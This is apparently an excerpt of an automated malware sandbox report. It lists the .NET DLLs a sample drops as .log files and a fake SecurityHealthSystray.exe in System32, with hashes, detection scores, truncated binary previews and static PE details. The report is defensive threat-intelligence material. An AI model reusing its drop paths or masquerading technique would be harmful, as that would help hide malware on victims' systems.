                                                                                                                                    C:\Users\user\Desktop\kdoiNyxj.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):23552
                                                                                                                                    Entropy (8bit):5.529329139831718
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\ndjISZpy.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\nweImycr.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):33792
                                                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\oQGhqvNX.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):23552
                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\quERYeDq.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32256
                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\rrfZteSl.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):69632
                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                    C:\Users\user\Desktop\wHsyCTFf.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):69632
                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                    C:\Users\user\Desktop\wexYWbhZ.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):22016
                                                                                                                                    Entropy (8bit):5.41854385721431
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\yzZxaXSF.log

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9728
                                                                                                                                    Entropy (8bit):5.0168086460579095
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                                    MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                                    SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                                    SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                                    SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                    C:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:MSVC .res
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1224
                                                                                                                                    Entropy (8bit):4.435108676655666
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4608
                                                                                                                                    Entropy (8bit):3.999793466829071
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:6CJzPt5M7Jt8Bs3FJsdcV4MKe273dNPvqBHWOulajfqXSfbNtm:ZPgPc+Vx9MfvkwcjRzNt
                                                                                                                                    MD5:74D9265C5C6AD04899B1D3B0B66CA29D
                                                                                                                                    SHA1:D5E9446379169E64DA39CCE906C4560D5FBA6570
                                                                                                                                    SHA-256:FFE468C90C0EAEBE4572748154017CD1A6DD13A70F7E032F4199FD1BFDBFD577
                                                                                                                                    SHA-512:69BC39758FF6C1A4754133A206318DB8196FF5F0BEE55E5E14384CDAD66F18D401973FC121D37F5B4EEA857D539C2429841212BC66066AC5B7D9BA3327493405
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h"f.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..l.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.<.......#GUID...L... ...#Blob...........WU........%3................................................................

                                                                                                                                    \Device\Null

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):502
                                                                                                                                    Entropy (8bit):4.621947447102293
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:PXw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:KdUOAokItULVDv
                                                                                                                                    MD5:2A6C589C9D3AC3A780DABA9F2CDA32BC
                                                                                                                                    SHA1:C9B54D3BABAE1D8EE0DC4FBD27290660A57C4771
                                                                                                                                    SHA-256:FCB1EA56700511672DD25E54F9D7890DB56A32D1221E92761918630448CA9BDA
                                                                                                                                    SHA-512:7A6572FF7C6CCAB310DD18FB4F167B0A164A1622C1D40DA2F44F2A6BB38ABFAE856B7D919D60C26336A8FACE53ABDB23466AAB5CCCB212671F07131D0C4A13D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..Pinging 065367 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                    File name:W4tW72sfAD.exe
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5:9026338fce277581062754cab87462e7
                                                                                                                                    SHA1:191b8d92c18b84fdef03f691583d8b89598cb7da
                                                                                                                                    SHA256:5565710131f195b46fb7c0b124d16df72ec5e0aafdd22590eaff7885aead636f
                                                                                                                                    SHA512:8be58979eec71fe69408aa621e756d76b58db496da456dad533fb88ad800ecf8d8e5933baedda4742c1dc4e5095f8fe7c3071f0339b056f54a378adb08908fca
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    TLSH:E2A5CE42B5124973CFD5E337D193403C42A1DA723996EF2B3A2A81C5F542271AF7A6F2
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ........@.. ....................... ...........@................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x5fd3de
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1fd3900x4b.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1fe0000x370.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2000000xc.reloc
